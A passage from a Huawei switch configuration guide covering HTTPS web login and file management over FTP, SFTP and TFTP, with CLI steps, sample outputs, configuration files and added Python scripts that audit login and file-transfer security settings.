Current Online Users : 0
Maximum Users Allowed : 5
HTTP Secure-server Status : enabled
HTTP Secure-server Port : 443(443)
HTTP SSL Policy : Default
HTTP IPv6 Server Status : disabled
HTTP IPv6 Server Port : 80(80)
HTTP IPv6 Secure-server Status : disabled
HTTP IPv6 Secure-server Port : 443(443)

----End

Configuration Files
Configuration file of the HTTPS_Server
#
sysname HTTPS_Server
#
FTP server enable
#
vlan batch 10
#
http server load web.7z
#
aaa
local-user admin password irreversible-cipher %@%@wU:(2j8~r8Htyu3.]',NwU`Td[-A9~9"%4Kvhm'0RV[/U`Ww%@%@
local-user admin privilege level 15
local-user admin service-type http
local-user client001 password irreversible-cipher %@%@5d~9:M^ipCfL\iB)EQd>,,ajwsi[\ad,saejin[qndi83Uwe%@%@
local-user client001 privilege level 15
local-user client001 ftp-directory flash:/
local-user client001 service-type ftp
#
interface Vlanif10
ip address 192.168.0.1 255.255.255.0
#
interface GigabitEthernet1/0/10
port link-type access
port default vlan 10
#
user-interface vty 0 14
authentication-mode aaa
#
return
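As an added example (Python, not Huawei's code), the following audit reads configuration files like the ones shown for the Telnet, STelnet and web-system examples in this chapter and reports the login-security settings they turn on or leave out: whether Telnet or FTP is enabled, whether the VTY interfaces use AAA and an inbound ACL, which inbound protocol they accept, and how SSH users authenticate. The two sample configurations are constructed and abbreviated from those examples, with the cipher text of keys and passwords left out; the severity labels are the author's, not Huawei's.

```python
"""Added example (Python), not Huawei's code: audit the login-security
settings in VRP configuration files like those shown in this chapter."""
import re
from typing import List

# Constructed sample, abbreviated from the Telnet example's configuration
# file; the RADIUS template and AAA blocks are omitted.
TELNET_CONFIG = """\
#
 sysname Switch
#
 telnet server enable
#
acl number 2008
 rule 5 permit source 10.137.217.177 0
#
user-interface vty 0 14
 acl 2008 inbound
 authentication-mode aaa
 user privilege level 15
 protocol inbound telnet
#
return
"""

# Constructed sample combining the STelnet example's VTY settings with the
# FTP server enabled in the web-system example (abbreviated).
STELNET_FTP_CONFIG = """\
#
 sysname Switch
#
 FTP server enable
#
user-interface vty 0 14
 authentication-mode aaa
 user privilege level 15
 protocol inbound ssh
#
 stelnet server enable
 ssh user admin authentication-type password
 ssh user admin service-type stelnet
#
return
"""


def parse_blocks(config: str) -> List[List[str]]:
    """Split a VRP configuration into blocks delimited by lines holding only '#'.
    Each block is a list of stripped lines; its first line names the block."""
    blocks, current = [], []
    for raw in config.splitlines():
        line = raw.strip()
        if line == "#":
            if current:
                blocks.append(current)
            current = []
        elif line and line != "return":
            current.append(line)
    if current:
        blocks.append(current)
    return blocks


def audit_login_security(config: str) -> List[str]:
    """Return severity-tagged findings for the login-related settings in config."""
    blocks = parse_blocks(config)
    all_lines = {line.lower() for block in blocks for line in block}
    findings = []
    if "telnet server enable" in all_lines:
        findings.append("HIGH: Telnet server enabled; credentials and sessions cross the "
                        "network in cleartext, prefer STelnet (SSH)")
    if "ftp server enable" in all_lines:
        findings.append("MEDIUM: FTP server enabled; prefer SFTP, SCP or FTPS for file transfer")
    for line in sorted(all_lines):
        match = re.fullmatch(r"ssh user (\S+) authentication-type password", line)
        if match:
            findings.append(f"INFO: SSH user {match.group(1)} authenticates with a password only")
    for block in blocks:
        if not block[0].lower().startswith("user-interface vty"):
            continue
        vty, body = block[0], [line.lower() for line in block[1:]]
        if "authentication-mode aaa" not in body:
            findings.append(f"HIGH: {vty} does not use AAA authentication")
        if not any(re.fullmatch(r"acl (ipv6 )?\S+ inbound", line) for line in body):
            findings.append(f"MEDIUM: {vty} has no inbound ACL limiting login source addresses")
        proto = next((line.split()[-1] for line in body if line.startswith("protocol inbound ")), None)
        if proto is None:
            findings.append(f"INFO: {vty} relies on the version default inbound protocol "
                            "(Telnet up to V200R006, SSH from V200R007)")
        elif proto in ("telnet", "all"):
            findings.append(f"HIGH: {vty} accepts Telnet logins")
        if "user privilege level 15" in body:
            findings.append(f"INFO: {vty} grants privilege level 15 to every login")
    return findings
```

Running audit_login_security(TELNET_CONFIG) flags the Telnet server and the Telnet-accepting VTY lines but not the ACL, while the STelnet sample is flagged only for FTP, the missing VTY ACL and password-only SSH authentication.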

Related Content
Videos
Log In to a Switch Using the Web System.
Configure a Switch Using the Web System.

3.4.3 Example for Configuring Switch Login Through the Web System

Overview
As a switch management mode, the web system leverages the built-in web server on a switch
to provide a GUI for users. Users can log in to the web system using HTTPS from terminals
and perform switch management and maintenance.

The web system is available in Classics and EasyOperation versions.
l The EasyOperation version provides rich graphics and a more user-friendly UI on which
users can perform monitoring, configuration, maintenance, and other network operations.
l The Classics version inherits the web page style of Huawei switches and provides
comprehensive configuration and management functions.

Configuration Notes
Web System is not supported in V200R007C20.

This example applies to all versions and models of S series switches.

Networking Requirements
As shown in Figure 3-10, a switch functions as the HTTPS server. The user wants to log in to
the web system using HTTPS to manage and maintain the switch.

Figure 3-10 Networking diagram for configuring switch login through the web system
[Figure: PC connected over the network to HTTPS_Server, 192.168.0.1/24]

Configuration Roadmap
The configuration roadmap is as follows:

l The system software of the switch has integrated and loaded the web page file. No
manual configuration is required.
l A switch provides a default SSL policy and has a randomly generated self-signed digital
certificate in the web page file. If the default SSL policy and self-signed digital
certificate can meet security requirements, you do not need to upload a digital certificate
or manually configure an SSL policy, simplifying configuration. The following
configuration uses the default SSL policy provided by the switch as an example.
l Configure a management IP address for logging in to the switch through the web system.
l Configure a web user and enter the web system login page.

Procedure
Step 1 Configure a management IP address.
<HUAWEI> system-view
[HUAWEI] sysname HTTPS_Server
[HTTPS_Server] vlan 10
[HTTPS_Server-vlan10] interface vlanif 10 //Configure VLANIF 10 as the management interface.
[HTTPS_Server-Vlanif10] ip address 192.168.0.1 24 //Configure the IP address and deploy the route based on the network plan to ensure reachability between the PC and switch.
[HTTPS_Server-Vlanif10] quit
[HTTPS_Server] interface gigabitethernet 1/0/10 //In this example, GE1/0/10 is the physical interface used for logging in to the switch through the web system on a PC. Select an interface based on actual networking requirements.
[HTTPS_Server-GigabitEthernet1/0/10] port link-type access //Set the interface type to access.
[HTTPS_Server-GigabitEthernet1/0/10] port default vlan 10 //Add the interface to VLAN 10.
[HTTPS_Server-GigabitEthernet1/0/10] quit

Step 2 Enable the HTTPS service.
[HTTPS_Server] http secure-server enable //The HTTPS service is enabled by default and does not require manual configuration. If the HTTPS service is manually disabled, run this command to enable it.

Step 3 Configure a web user and enter the web system login page.
# Configure a web user.
[HTTPS_Server] aaa
[HTTPS_Server-aaa] local-user admin password irreversible-cipher Helloworld@6789 //Set the login password to Helloworld@6789.
[HTTPS_Server-aaa] local-user admin privilege level 15 //Set the user level to 15.
[HTTPS_Server-aaa] local-user admin service-type http //Set the user service type to HTTP.
[HTTPS_Server-aaa] quit

# Enter the web system login page.

Open the web browser on the PC, type https://192.168.0.1 in the address box, and press
Enter. The web system login page is displayed, as shown in Figure 3-11.

Table 3-3 lists browser versions required for login to a switch through the web system. If a
browser or browser patch in an earlier version is used, the web page may not be properly
displayed. Upgrade the browser and browser patch. In addition, the browser must support
JavaScript.

Enter the web user name admin and password Helloworld@6789, and click GO or press
Enter. The web system home page is displayed. The EasyOperation web system is logged in
by default.

Table 3-3 Mapping between the product version and browser version

Product Version | Browser Version for EasyOperation Web System | Browser Version for Classic Web System
V200R006 | Internet Explorer 8.0 to 11.0, Firefox 12.0 to 28.0, or Google Chrome 23.0 to 32.0 | Internet Explorer 8.0 to 11.0, or Firefox 12.0 to 28.0
V200R007 | Internet Explorer 8.0 to 11.0, Firefox 12.0 to 32.0, or Google Chrome 23.0 to 37.0 | Internet Explorer 8.0 to 11.0, or Firefox 12.0 to 32.0
V200R008 | Internet Explorer 10.0, Internet Explorer 11.0, Firefox 31.0 to 35.0, or Google Chrome 30.0 to 39.0 | Internet Explorer 10.0, Internet Explorer 11.0, or Firefox 31.0 to 35.0
V200R009 | Internet Explorer 10.0, Internet Explorer 11.0, Firefox 35.0 to 43.0, or Google Chrome 34.0 to 48.0 | Internet Explorer 10.0, Internet Explorer 11.0, or Firefox 35.0 to 43.0
V200R010 | Internet Explorer 10.0, Internet Explorer 11.0, Firefox 40.0 to 45.0, or Google Chrome 39.0 to 49.0 | Internet Explorer 10.0, Internet Explorer 11.0, or Firefox 40.0 to 45.0

Figure 3-11 Web system login page

Step 4 Verify the configuration.

Log in to the switch through the web system. The login succeeds.

Run the display http server command to view the status of the HTTPS server.
[HTTPS_Server] display http server
HTTP Server Status : enabled
HTTP Server Port : 80(80)
HTTP Timeout Interval : 20
Current Online Users : 0
Maximum Users Allowed : 5
HTTP Secure-server Status : enabled
HTTP Secure-server Port : 443(443)
HTTP SSL Policy : Default
HTTP IPv6 Server Status : disabled
HTTP IPv6 Server Port : 80(80)
HTTP IPv6 Secure-server Status : disabled
HTTP IPv6 Secure-server Port : 443(443)
HTTP server source address : 0.0.0.0

----End

Configuration Files
Configuration file of the HTTPS_Server
#
sysname HTTPS_Server
#
vlan batch 10
#
aaa
local-user admin password irreversible-cipher %#%#wU:(2j8~r8Htyu3.]',NwU`Td[-A9~9"%4Kvhm'0RV[/U`Ww%#%#
local-user admin privilege level 15
local-user admin service-type http
#
interface Vlanif10
ip address 192.168.0.1 255.255.255.0
#
interface GigabitEthernet1/0/10
port link-type access
port default vlan 10
#
return

4 Typical File Management Configuration

About This Chapter

4.1 Example for Logging In to the Device to Manage Files
4.2 Example for Managing Files Using FTP
4.3 Example for Managing Files Using SFTP
4.4 Example for Accessing Files on Other Devices Using TFTP
4.5 Example for Accessing Files on Other Devices Using FTP
4.6 Example for Accessing Files on Other Devices Using SFTP

4.1 Example for Logging In to the Device to Manage Files
Overview
Users can log in to the device using the console port, Telnet, or STelnet to manage storages,
directories, and files. The storages can be managed only by login users. However, only local
files can be managed after users log in to the device. To transfer files, you can use the FTP,
TFTP, Secure Copy Protocol (SCP), or FTPS mode.

Configuration Notes
l Before logging in to the device to manage files, complete the following task:
– Logging in to the device from a terminal
l This example applies to all versions and all models of S series switches.

Networking Requirements
A user logs in to the Switch using the console port, Telnet, or STelnet from the PC, and needs
to perform the following operations on the files on the Switch:

l View the files and subdirectories in the current directory.
l Create the directory test. Copy the file vrpcfg.zip to test and rename the file as
backup.zip.
l View files in test.

Figure 4-1 Networking diagram for logging in to the device to manage files
[Figure: PC connected to the Switch]

Procedure
Step 1 View the files and subdirectories in the current directory.
<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] quit
<Switch> dir
Directory of flash:/

Idx Attr Size(Byte) Date Time FileName
0 -rw- 889 Mar 01 2012 14:41:56 private-data.txt
1 -rw- 6,311 Feb 17 2012 14:05:04 backup.cfg
2 -rw- 2,393 Mar 06 2012 17:20:10 vrpcfg.zip
3 -rw- 812 Dec 12 2011 15:43:10 hostkey
4 drw- - Mar 01 2012 14:41:46 compatible
5 -rw- 540 Dec 12 2011 15:43:12 serverkey
...
509,256 KB total (52,752 KB free)

Step 2 Create the directory test. Copy the file vrpcfg.zip to test and rename the file as backup.zip.
# Create the directory test.
<Switch> mkdir test
Info: Create directory flash:/test......Done.

# Copy the file vrpcfg.zip to test and rename the file as backup.zip.
<Switch> copy vrpcfg.zip flash:/test/backup.zip //Set the target file name to backup.zip. If not specified, the target file name is the same as the source file name.
Copy flash:/vrpcfg.zip to flash:/test/backup.zip?[Y/N]:y
100% complete/
Info: Copied file flash:/vrpcfg.zip to flash:/test/backup.zip...Done.

Step 3 View files in test.
# Access test.
<Switch> cd test

# View the current directory.
<Switch> pwd
flash:/test

# View files in test.
<Switch> dir
Directory of flash:/test/

Idx Attr Size(Byte) Date Time FileName
0 -rw- 2,399 Mar 12 2012 11:16:44 backup.zip

509,256 KB total (52,748 KB free)

----End

Configuration Files
Configuration file of the Switch
#
sysname Switch
#
return

4.2 Example for Managing Files Using FTP

Overview
After a device is configured as an FTP server, users can access the device using the FTP client
software on the local terminals. Then the users can manage files between the device and local
terminals. The configuration for managing files using FTP is simple, and FTP supports file
transfer and file directory management.
FTP provides the authorization and authentication functions for managing files. However,
data is transferred in plaintext, which brings security risks.
FTP is applicable to file management when high network security is not required, and is often
used in version upgrades.

Configuration Notes
l Before managing files using FTP, complete the following tasks:
– Ensuring that routes are reachable between the terminal and the device
– Ensuring that FTP client software is installed on the terminal
l The FTP protocol will bring risks to network security. The SFTP V2, Secure Copy
Protocol (SCP), or FTPS mode is recommended.
l If the number of FTP users on the device reaches the maximum value (5), new
authorized users cannot log in. To ensure that new FTP users successfully log in to the
device, FTP users that have completed file operations need to get offline.
l This example applies to all versions and all models of S series switches.

Networking Requirements
As shown in Figure 4-2, the PC connects to the device, and IP address of the management
network interface on the device is 10.136.23.5. The device needs to be upgraded. The device
is required to function as the FTP server so that you can upload the system software from the
PC to the device and back up the configuration file to the PC.

Figure 4-2 Networking diagram for managing files using FTP

10.136.23.5/24
Internet

PC FTP_Server

Configuration Roadmap
The configuration roadmap is as follows:
1. Configure the FTP function for the device and information about an FTP user, including
the user name and password, user level, service type, and authorized directory.
2. Save the current configuration file on the device.
3. Connect the PC to the device using FTP.
4. Upload the system software to the device and back up the configuration file of the device
to the PC.

Procedure
Step 1 Configure the FTP function for the device and information about an FTP user.
<HUAWEI> system-view
[HUAWEI] sysname FTP_Server
[FTP_Server] ftp server enable //Enable the FTP server function.
[FTP_Server] aaa
[FTP_Server-aaa] local-user admin1234 password irreversible-cipher Helloworld@6789 //Set the login password to Helloworld@6789.
[FTP_Server-aaa] local-user admin1234 privilege level 15 //Set the user level to 15.
[FTP_Server-aaa] local-user admin1234 service-type ftp //Set the user service type to FTP.
[FTP_Server-aaa] local-user admin1234 ftp-directory flash:/ //Set the FTP service authorized directory to flash:/.
[FTP_Server-aaa] quit
[FTP_Server] quit

Step 2 Save the current configuration file on the device.
<FTP_Server> save

Step 3 Connect the PC to the device using FTP. Enter the user name admin1234 and password
Helloworld@6789 and set the file transfer mode to binary.
The following example assumes that the PC runs the Windows XP operating system.
C:\Documents and Settings\Administrator> ftp 10.136.23.5
Connected to 10.136.23.5.
220 FTP service ready.
User (10.136.23.5:(none)): admin1234
331 Password required for admin1234.
Password:
230 User logged in.
ftp> binary //Set the file transfer mode to binary. The default mode is ASCII.
200 Type set to I.
ftp>

The ASCII mode is used to transfer text files, and the binary mode is used to transfer
programs including the system software (with the file name extension of .cc, .bin, or .pat),
images, voices, videos, compressed packages, and database files.
Step 4 Upload the system software to the device and back up the configuration file of the device to
the PC.
# Upload the system software to the device.
ftp> put devicesoft.cc
200 Port command okay.
150 Opening BINARY mode data connection for devicesoft.cc
226 Transfer complete.
ftp: 106616955 bytes sent in 151.05 Seconds 560.79Kbytes/sec.

# Back up the configuration file of the device to the PC.
ftp> get vrpcfg.zip
200 Port command okay.
150 Opening BINARY mode data connection for vrpcfg.zip.
226 Transfer complete.
ftp: 1257 bytes received in 0.03Seconds 40.55Kbytes/sec.

NOTE

Before uploading and downloading files to the FTP server, determine the FTP working directory on the
FTP client. For example, the default FTP working directory on the Windows XP operating system is the
login user working directory (such as C:\Documents and Settings\Administrator). This directory also
stores the system software to be uploaded and backup configuration file.

Step 5 Verify the configuration.
# Run the dir command on the device to check whether the system software is uploaded to the
device.
<FTP_Server> dir
Directory of flash:/

Idx Attr Size(Byte) Date Time FileName


0 -rw- 14 Mar 13 2012 14:13:38 back_time_a
1 drw- - Mar 11 2012 00:58:54 logfile
2 -rw- 4 Nov 17 2011 09:33:58 snmpnotilog.txt
3 -rw- 11,238 Mar 12 2012 21:15:56 private-data.txt
4 -rw- 1,257 Mar 12 2012 21:15:54 vrpcfg.zip
5 -rw- 14 Mar 13 2012 14:13:38 back_time_b
6 -rw- 106,616,955 Mar 13 2012 14:24:24 devicesoft.cc

7 drw- - Oct 31 2011 10:20:28 sysdrv
8 drw- - Feb 21 2012 17:16:36 compatible
9 drw- - Feb 09 2012 14:20:10 selftest
10 -rw- 19,174 Feb 20 2012 18:55:32 backup.cfg
11 -rw- 23,496 Dec 15 2011 20:59:36 20111215.zip
12 -rw- 588 Nov 04 2011 13:54:04 servercert.der
13 -rw- 320 Nov 04 2011 13:54:26 serverkey.der
14 drw- - Nov 04 2011 13:58:36 security
...
509,256 KB total (52,752 KB free)
# Check whether the file vrpcfg.zip is stored in the FTP working directory on the PC.

----End
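Step 5 compares what the FTP client reported with what the device now holds. The following Python script is an added example, not part of Huawei's documentation: it parses the device's dir output and the FTP client session shown above (both copied from this example and embedded as sample input), confirms that each transfer ran in BINARY mode, and checks that the byte count the client reported equals the size the device recorded. A mismatch is the symptom of a transfer left in the default ASCII mode (line-ending translation changes the byte count of a .cc image) or of a transfer cut short.

```python
import re

# Sample input: the `dir` listing and FTP client log from the example above,
# trimmed to the rows that matter.
DEVICE_DIR = """\
Directory of flash:/

Idx Attr Size(Byte) Date Time FileName
0 -rw- 14 Mar 13 2012 14:13:38 back_time_a
1 drw- - Mar 11 2012 00:58:54 logfile
4 -rw- 1,257 Mar 12 2012 21:15:54 vrpcfg.zip
6 -rw- 106,616,955 Mar 13 2012 14:24:24 devicesoft.cc

509,256 KB total (52,752 KB free)
"""

FTP_LOG = """\
ftp> put devicesoft.cc
200 Port command okay.
150 Opening BINARY mode data connection for devicesoft.cc
226 Transfer complete.
ftp: 106616955 bytes sent in 151.05 Seconds 560.79Kbytes/sec.
ftp> get vrpcfg.zip
200 Port command okay.
150 Opening BINARY mode data connection for vrpcfg.zip.
226 Transfer complete.
ftp: 1257 bytes received in 0.03Seconds 40.55Kbytes/sec.
"""

# One row of VRP `dir` output: index, attributes, size (or "-" for a directory), date, time, name.
DIR_ROW = re.compile(
    r"^\s*\d+\s+(?P<attr>[d-]rw-)\s+(?P<size>[\d,]+|-)\s+"
    r"\w{3} \d{2} \d{4}\s+\d{2}:\d{2}:\d{2}\s+(?P<name>\S+)\s*$"
)
CMD = re.compile(r"^ftp> (put|get) (\S+)")
MODE = re.compile(r"^150 Opening (\w+) mode")
DONE = re.compile(r"^ftp: (\d+) bytes (sent|received)")


def parse_dir(text):
    """Map file name -> size in bytes (None for directories) from `dir` output."""
    files = {}
    for line in text.splitlines():
        m = DIR_ROW.match(line)
        if m:
            size = None if m["size"] == "-" else int(m["size"].replace(",", ""))
            files[m["name"]] = size
    return files


def parse_ftp_log(text):
    """Return one dict per completed transfer: direction, name, data mode, byte count."""
    transfers, current = [], None
    for line in text.splitlines():
        c = CMD.match(line)
        if c:
            current = {"dir": c[1], "name": c[2], "mode": None}
            continue
        mo = MODE.match(line)
        if mo and current:
            current["mode"] = mo[1]
            continue
        d = DONE.match(line)
        if d and current:
            current["bytes"] = int(d[1])
            transfers.append(current)
            current = None
    return transfers


def verify_transfers(dir_text, ftp_log):
    """Return (name, verdict) for each transfer, comparing client byte counts with device sizes."""
    on_device = parse_dir(dir_text)
    results = []
    for t in parse_ftp_log(ftp_log):
        name = t["name"]
        if t["mode"] != "BINARY":
            results.append((name, "transferred in %s mode, not BINARY" % t["mode"]))
            continue
        size = on_device.get(name)
        if size is None:
            results.append((name, "missing on device"))
        elif size != t["bytes"]:
            results.append((name, "size mismatch: device %d vs transferred %d" % (size, t["bytes"])))
        else:
            results.append((name, "ok"))
    return results


if __name__ == "__main__":
    for name, verdict in verify_transfers(DEVICE_DIR, FTP_LOG):
        print(f"{name}: {verdict}")
```

Run it after pasting a fresh dir listing and the client session into the two sample strings; any verdict other than "ok" means the upload should be repeated before the device is rebooted onto the new software.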

Configuration Files
Configuration file of the FTP_Server
#
sysname FTP_Server
#
FTP server enable
#
aaa
local-user admin1234 password irreversible-cipher %^%#-=9Z)M,-aL$_U%#$W^1T-\}Fqpe$E<#H$J<6@KTSL/J'\}I-%^%#
local-user admin1234 privilege level 15
local-user admin1234 ftp-directory flash:/
local-user admin1234 service-type ftp
#
return

Related Content
Videos

Remotely Transfer Files Using FTP.

4.3 Example for Managing Files Using SFTP

Overview
After a device is configured as an SFTP server, users can communicate with the device using
SFTP. SFTP runs over SSH, which secures the connection: data is encrypted and its integrity
is protected, so SFTP provides high security. SFTP and FTP can both be configured on the
device.

SFTP is applicable to file management when high network security is required, and is often
used for downloading logs and backing up the configuration file.

Configuration Notes
l Before managing files using SFTP, complete the following tasks:
– Ensuring that routes are reachable between the terminal and the device
– Ensuring that the SSH client software has been installed on the terminal
l The SFTP V1 protocol will bring risks to network security. The SFTP V2 or FTPS mode
is recommended.

l This example applies to all versions and all models of S series switches.

Networking Requirements
As shown in Figure 4-3, the PC connects to the device, and the IP address of the management
network interface on the device is 10.136.23.4. Files need to be securely transferred between
the PC and device to prevent man-in-the-middle attacks and some network attacks (such as
DNS spoofing and IP spoofing). Configure the device as the SSH server to provide the SFTP
service so that the SSH server can authenticate the client and encrypt data in bidirectional
mode to ensure secure file transfer.

Figure 4-3 Networking diagram for managing files using SFTP

10.136.23.4/24
Internet

PC SSH_Server

Configuration Roadmap
The configuration roadmap is as follows:
1. Generate a local key pair on the SSH server and enable the SFTP server function to
implement secure data exchange between the server and client.
2. Configure VTY user interfaces on the SSH server.
3. Configure an SSH user, including the authentication mode, service type, SFTP
authorized directory, user name, and password.
4. Use the third-party software OpenSSH to access the SSH server.

Procedure
Step 1 Generate a local key pair on the SSH server and enable the SFTP server function.
<HUAWEI> system-view
[HUAWEI] sysname SSH_Server
[SSH_Server] dsa local-key-pair create //Generate a local DSA key pair.
Info: The key name will be: SSH_Server_Host_DSA.
Info: The key modulus can be any one of the following : 1024, 2048.
Info: If the key modulus is greater than 512, it may take a few minutes.
Please input the modulus [default=2048]: //Press Enter. The default key length (2048 bits) is used.
Info: Generating keys...
Info: Succeeded in creating the DSA host keys.
[SSH_Server] sftp server enable //Enable the SFTP server function.

Step 2 Configure VTY user interfaces on the SSH_Server.
[SSH_Server] user-interface vty 0 14 //Enter the user interface views of VTY 0 to VTY 14.
[SSH_Server-ui-vty0-14] authentication-mode aaa //Set the authentication mode of users in VTY 0 to VTY 14 to AAA.
[SSH_Server-ui-vty0-14] protocol inbound ssh //Configure the user interface views of VTY 0 to VTY 14 to support SSH.
[SSH_Server-ui-vty0-14] quit

Step 3 Configure an SSH user, including the authentication mode, service type, SFTP authorized
directory, user name, and password.
[SSH_Server] ssh user client001 authentication-type password //Set the authentication mode to password authentication.
[SSH_Server] ssh user client001 service-type sftp //Set the user service type to SFTP.
[SSH_Server] ssh user client001 sftp-directory flash: //Set the SFTP service authorized directory to flash:.
[SSH_Server] aaa
[SSH_Server-aaa] local-user client001 password irreversible-cipher Helloworld@6789 //Set the login password to Helloworld@6789.
[SSH_Server-aaa] local-user client001 privilege level 15 //Set the user level to 15.
[SSH_Server-aaa] local-user client001 service-type SSH //Set the user service type to SSH.
[SSH_Server-aaa] quit

Step 4 Access the SFTP server using OpenSSH.
OpenSSH commands can be used in the Windows Command Prompt window only after the
OpenSSH software is installed.

NOTE
Ensure that the OpenSSH version matches the operating system of the PC. Otherwise, you may fail to
access the device using SFTP.

Figure 4-4 Windows Command Prompt window

After the PC connects to the device using the third-party software, enter the SFTP view to
perform file operations.

----End

Configuration Files
Configuration file of the SSH_Server
#
sysname SSH_Server
#
aaa
local-user client001 password irreversible-cipher %^%#-=9Z)M,-aL$_U%#$W^1T-\}Fqpe$E<#H$J<6@KTSL/J'\}I-%^%#
local-user client001 privilege level 15
local-user client001 service-type ssh
#
sftp server enable
ssh user client001
ssh user client001 authentication-type password
ssh user client001 service-type sftp
ssh user client001 sftp-directory flash:
#
user-interface vty 0 14
authentication-mode aaa
#
return
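The configuration files of sections 4.2 and 4.3 differ in exactly the settings the Configuration Notes warn about: whether a plaintext FTP service is enabled, which users may use it, and whether the VTY lines are restricted to SSH. The following Python script is an added example, not Huawei's code, that audits a saved VRP configuration for those points. Its sample input is the FTP_Server and SSH_Server configuration files from the two examples above (with the irreversible-cipher text replaced by a placeholder). The "info" findings are least-privilege observations about the authorized directory, not settings the device rejects; the VTY rule treats the absence of an explicit protocol inbound ssh line as a warning.

```python
import re

# Sample input: configuration files from the two examples above, cipher text omitted.
FTP_SERVER_CFG = """\
#
sysname FTP_Server
#
FTP server enable
#
aaa
 local-user admin1234 password irreversible-cipher %^%#<cipher text omitted>%^%#
 local-user admin1234 privilege level 15
 local-user admin1234 ftp-directory flash:/
 local-user admin1234 service-type ftp
#
return
"""

SSH_SERVER_CFG = """\
#
sysname SSH_Server
#
aaa
 local-user client001 password irreversible-cipher %^%#<cipher text omitted>%^%#
 local-user client001 privilege level 15
 local-user client001 service-type ssh
#
sftp server enable
ssh user client001
ssh user client001 authentication-type password
ssh user client001 service-type sftp
ssh user client001 sftp-directory flash:
#
user-interface vty 0 14
 authentication-mode aaa
#
return
"""

SERVICE_TYPE = re.compile(r"^local-user (\S+) service-type (.+)$")
AUTHORIZED_DIR = re.compile(r"^(?:local-user|ssh user) (\S+) s?ftp-directory (\S+)$")


def audit_file_transfer_config(cfg):
    """Return (severity, message) findings for the file-transfer settings of a VRP config.

    warning: a plaintext service is enabled or permitted for a user, or a VTY block
             does not explicitly restrict inbound access to SSH
    info:    a least-privilege observation about the authorized directory
    """
    lines = [line.strip() for line in cfg.splitlines()]
    findings = []

    # The config file prints the FTP service as "FTP server enable"; match case-insensitively.
    if any(line.lower() == "ftp server enable" for line in lines):
        findings.append(("warning", "FTP server enabled: credentials and files cross the "
                         "network in plaintext; prefer SFTP, SCP or FTPS"))

    for line in lines:
        m = SERVICE_TYPE.match(line)
        if m and "ftp" in m.group(2).lower().split():
            findings.append(("warning", f"local user {m.group(1)} is permitted to log in over FTP"))
        m = AUTHORIZED_DIR.match(line)
        if m and m.group(2).rstrip("/") == "flash:":
            findings.append(("info", f"user {m.group(1)} is authorized for the whole flash: "
                             "root; a dedicated subdirectory bounds what the account can reach"))

    # Every "user-interface vty" block should carry "protocol inbound ssh".
    block = None
    for line in lines + ["#"]:          # the trailing "#" flushes the last block
        if line.startswith("user-interface vty"):
            block, restricted = line, False
        elif block is not None and line == "protocol inbound ssh":
            restricted = True
        elif block is not None and line == "#":
            if not restricted:
                findings.append(("warning", f"'{block}' does not set 'protocol inbound ssh'"))
            block = None
    return findings


def warnings_only(cfg):
    """Just the warning-level messages, for a quick pass/fail view."""
    return [msg for sev, msg in audit_file_transfer_config(cfg) if sev == "warning"]


if __name__ == "__main__":
    for name, cfg in (("FTP_Server", FTP_SERVER_CFG), ("SSH_Server", SSH_SERVER_CFG)):
        print(name)
        for sev, msg in audit_file_transfer_config(cfg):
            print(f"  [{sev}] {msg}")
```

Feed it the output of display current-configuration saved to a file; the FTP_Server sample yields two warnings, and the SSH_Server sample yields one warning that disappears once protocol inbound ssh is present under the VTY block.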

4.4 Example for Accessing Files on Other Devices Using TFTP

Overview
After a device is configured as a TFTP client, it can access the remote TFTP server to upload
and download files on the TFTP server. When you access other devices using TFTP, you do
not need to enter the user name or password, simplifying information exchange. TFTP has no
authorization or authentication mechanism and transfers data in plaintext, which brings
security risks and is vulnerable to network viruses and attacks. Exercise caution when using
TFTP.
On a high-performance LAN in a lab environment, TFTP can be used to load and upgrade the
system software.

Configuration Notes
l Before accessing files on the TFTP server, ensure that routes are reachable between the
device and TFTP server.
l The device can only function as a TFTP client.
l The TFTP mode supports only file transfer, but does not support interaction.
l TFTP has no authorization or authentication mechanism and transfers data in plaintext,
which brings security risks and is vulnerable to network viruses and attacks.
l This example applies to all versions and all models of S series switches.

Networking Requirements
As shown in Figure 4-5, the remote server at IP address 10.1.1.1/24 functions as the TFTP
server. The device at IP address 10.2.1.1/24 functions as the TFTP client and has reachable
routes to the TFTP server.
The device needs to be upgraded. You need to download the system software from the TFTP
server to the device and back up the current configuration file of the device to the TFTP
server.

Figure 4-5 Networking diagram for accessing files on another device using TFTP

10.2.1.1/24 10.1.1.1/24
Internet

TFTP Client TFTP Server

Configuration Roadmap
The configuration roadmap is as follows:
1. Run the TFTP software on the TFTP server and set the TFTP working directory.
2. Upload and download files on the device using TFTP commands.

Procedure
Step 1 Run the TFTP software on the TFTP server and set the TFTP working directory. For the
detailed operations, see the help document of the third-party TFTP software.
Step 2 Upload and download files on the device using TFTP commands.
<HUAWEI> tftp 10.1.1.1 get devicesoft.cc //Download devicesoft.cc.
Info: Transfer file in binary mode.
Downloading the file from the remote TFTP server. Please wait...
|
TFTP: Downloading the file successfully.
106616955 byte(s) received in 722 second(s).

<HUAWEI> tftp 10.1.1.1 put vrpcfg.zip //Upload vrpcfg.zip.
Info: Transfer file in binary mode.
Uploading the file to the remote TFTP server. Please wait...
100%
TFTP: Uploading the file successfully.
7717 byte(s) sent in 1 second(s).

Step 3 Verify the configuration.
# Run the dir command on the device to check whether the system software is downloaded to
the device.
<HUAWEI> dir
Directory of flash:/

Idx Attr Size(Byte) Date Time FileName


0 -rw- 14 Mar 13 2012 14:13:38 back_time_a
1 drw- - Mar 11 2012 00:58:54 logfile
2 -rw- 4 Nov 17 2011 09:33:58 snmpnotilog.txt
3 -rw- 11,238 Mar 12 2012 21:15:56 private-data.txt
4 -rw- 7,717 Mar 12 2012 21:15:54 vrpcfg.zip
5 -rw- 14 Mar 13 2012 14:13:38 back_time_b
6 -rw- 106,616,955 Mar 13 2012 14:24:24 devicesoft.cc
7 drw- - Oct 31 2011 10:20:28 sysdrv

8 drw- - Feb 21 2012 17:16:36 compatible
9 drw- - Feb 09 2012 14:20:10 selftest
10 -rw- 19,174 Feb 20 2012 18:55:32 backup.cfg
11 -rw- 43,496 Dec 15 2011 20:59:36 20111215.zip
12 -rw- 588 Nov 04 2011 13:54:04 servercert.der
13 -rw- 320 Nov 04 2011 13:54:26 serverkey.der
14 drw- - Nov 04 2011 13:58:36 security
...
509,256 KB total (52,752 KB free)

# Check whether the file vrpcfg.zip is stored in the working directory on the TFTP server.
----End

Configuration Files
None

4.5 Example for Accessing Files on Other Devices Using FTP

Overview
After a device is configured as an FTP client, it can log in to the FTP server for transferring
